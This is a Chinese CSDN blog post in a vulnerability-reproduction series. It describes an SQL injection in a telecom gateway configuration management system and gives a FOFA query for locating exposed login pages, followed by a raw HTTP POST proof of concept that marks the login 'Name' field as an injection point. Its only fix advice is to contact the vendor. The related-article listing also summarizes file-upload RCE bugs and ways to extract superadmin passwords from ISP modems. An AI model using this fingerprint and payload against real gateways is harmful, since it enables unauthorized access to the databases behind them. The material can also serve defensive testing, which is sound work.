【漏洞复现】电信网关配置管理系统SQL注入漏洞

已于 2024-02-06 14:07:16 修改
阅读量1.1k 收藏 7
点赞数 12
文章标签: 网络 安全 服务器 web安全
于 2024-02-06 14:05:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136055955
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

本文介绍了电信网关配置管理系统中的SQL注入漏洞,该漏洞可能导致攻击者获取数据库敏感信息。通过产品简介和详细漏洞描述,揭示了问题所在。提供POC以复现漏洞,并建议联系软件厂商进行修复。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能,从而确保网络的正常运行和高效性能。

Nx02 漏洞描述

        电信网关配置管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

Nx03 产品主页

fofa-query: body="img/dl.gif" && title="系统登录"

Nx04 漏洞复现

POC:

POST /manager/login.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

Name=admin*&Pass=admin

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

电信网关配置管理系统后台 upload.php 文件上传漏洞复现
0xSec
12-14 1427
电信网关配置管理系统后台/manager/teletext/material/upload.php 接口存在文件上传漏洞,攻击者可以利用文件上传漏洞获取系统权限。
电信网关配置管理系统 rewrite.php 文件上传致RCE漏洞复现
0xSec
05-10 929
电信网关配置管理系统/manager/teletext/material/rewrite.php 接口存在文件上传漏洞,未经身份验证的远程攻击者可以利用文件上传漏洞获取系统权限。
电信网关配置管理系统弱口令(含批量验证poc)
weixin_43567873的博客
05-11 431
电信网关配置管理系统弱口令(含批量验证poc)
一次对天翼安全网关的渗透
zhangge3663的博客
01-29 4701
起因 听大师傅说天翼安全网关可以telnet登录,回去尝试了一下发现并没有开放telnet端口,把目标转向如何开启,经过一系列搜索,最后拿下网关 信息泄露 我家这个网关型号是HG261GS,经过一番搜索,发现访问http://192.168.1.1/cgi-bin/baseinfoSet.cgi可以拿到密码 然后搜索密码的加密方式,得到工程账号的密码,加密算法为加密算法: 字母转换为其ASCII码+4,数字直接就是ASCII码。 之后登陆 命令执行 在后台转了一圈没发现开启tel.
破解天翼网关3.0/4.0 通用破解超级管理员密码
weixin_51384630的博客
07-25 1万+
设置代理后,打开指示灯按钮,然后利用burp抓包。然后把手机连接光猫wifi 设置里面代理为KALI机器的IP地址跟对应的端口。回到Burp 在Proxy 把Intercept is on 开启。打开手机小翼管家绑定到自己的光猫上,然后进入网关设置把指示灯关闭。我这里是准备好KALI虚拟机,kali虚拟机自带Burp。点击Proxy,然后点击Proxy settings。弹出选项框:点击Add 添加我们对应的网卡地址跟端口。接着回到手机把指示灯按钮点一下,接着KALI就抓到了。配置完成后关闭选项框。
Goby 漏洞发布|电信网关配置管理系统后台 /manager/teletext/material/upload.php 文件上传漏洞
m0_46699477的博客
06-21 535
中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。 电信网关配置管理系统后台 /manager/teletext/material/upload.php 存在文件上传漏洞,攻击者可以利用文件上传漏洞获取系统权限。
SQL注入漏洞发现和数据库监控系统.zip
最新发布
05-27
本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 首先,让我们了解SQL注入的基本原理。当用户输入的数据未经充分过滤或转义就被直接拼接到SQL查询语句中,攻击者可以通过构造特殊的输入来执行...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
中国电信漏洞危害近亿用户
09-11
中国电信漏洞危害
php中sql注入漏洞示例 sql注入漏洞修复
12-18
c) 用户的恶意SQL语句被发送给数据库管理系统(DBMS)。 d) DBMS解析并执行恶意SQL,可能获取敏感数据或执行非授权操作。 e) 结果返回给用户,可能导致信息泄露或其他安全问题。 2. **SQL注入实例**: 为了演示...
天翼网关获取超级管理员密码 简单 快捷
热门推荐
qq_42184699的博客
01-26 18万+
关猫型号:epon上行天翼网关(2+0) 最近想做内网的端口映射 网上的内网穿透有点小贵,所以就在自家的关猫里映射一下   端口映射需要超级管理员权限 普通用户登陆后 http://192.168.1.1/romfile.cfg 就能下载配置文件,里面就有超密,打开搜索web_passwd后就是超级管理员密码。 即可                                  ...
天翼网关获取超级密码
看那白熊
02-16 9万+
如何以超级用户身份登录天翼网关(光猫)
电信光猫改桥接还在苦苦破解超级密码吗?
weixin_43990641的博客
12-09 1万+
电信光猫路由改桥接,不同的地区有不通的方法。比较幸运的地区和终端,有通用的超级密码。但是不幸的地区,就需要通过破解这个超级密码。我就属于比较不幸的地区,遇到不幸的终端:天翼网关TEWA-708G。然后按照网上大神的破解方法:先是普通用户登录,然后通过备份的方式,将备份文件考出,再通过电脑上的网页源码查看软件找到超级用户的密码。里面当然也有宽带的用户名和密码。通过多方努力,我成功了。然后开心的准备给家里买个新的路由器,准备换上。这中间大概隔了一两周的时间。悲剧发生了。。。。。。光猫的版本升级了,这个漏洞电信
openwrt控制天翼网关定时重启
jmsw4bn的专栏
03-29 7161
由于天翼网关不支持定时重启,另外app里设置定时重启也没有作用, 所以查找了一些相关工具和用法,再结合前辈的经验:参考的博客网址,自己最终把该功能实现了。 首先需要用winscp登陆到刷了openwrt的路由器中, 然后在/usr/bin/ 目录下建立一个reboot.sh文件,文件内容如下,其中的网址中的IP请改为天翼网关的IP地址, 另外“用户名”、“密码”也改为相应的登陆名和密...
天翼宽带政企网关B2-1P 如何获得超级管理员账号?
09-28 2590
RT 用useradmin没办法做NAT,想进telecomadmin里面看看,,,,,并且已经使用过nE7jA%5m这个密码登录,没有用! 求办法!!! 最佳答案   查找超级管理员密码方法:  1、用光猫背后的useradmin 帐号和密码登录 192.168.1.12  2、下载http://192.168.1.1/backupse...
关于天翼网关端口不能映射,以及修改网关连接模式的方法
童忠言_开源交流的专栏
03-08 3万+
昨天联系电信更换千兆光猫,师傅来换了个天翼网关,这个天翼网关是自己主动拨号,直接导致我软路由里搭建的服务在广域网上不能访问了(虽然天翼网关可以设置端口转发,但是就是个摆设,设置后端口也是无法转发的) 既然这样,我们就要想办法把它修改成桥接模式,让路由器/软路由来拨号,我们不需要网关自作主张去拨号,该怎么做呢?研究了一会,方法如下 其实天翼网关有2个管理入口: 默认:192.168.1.1 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值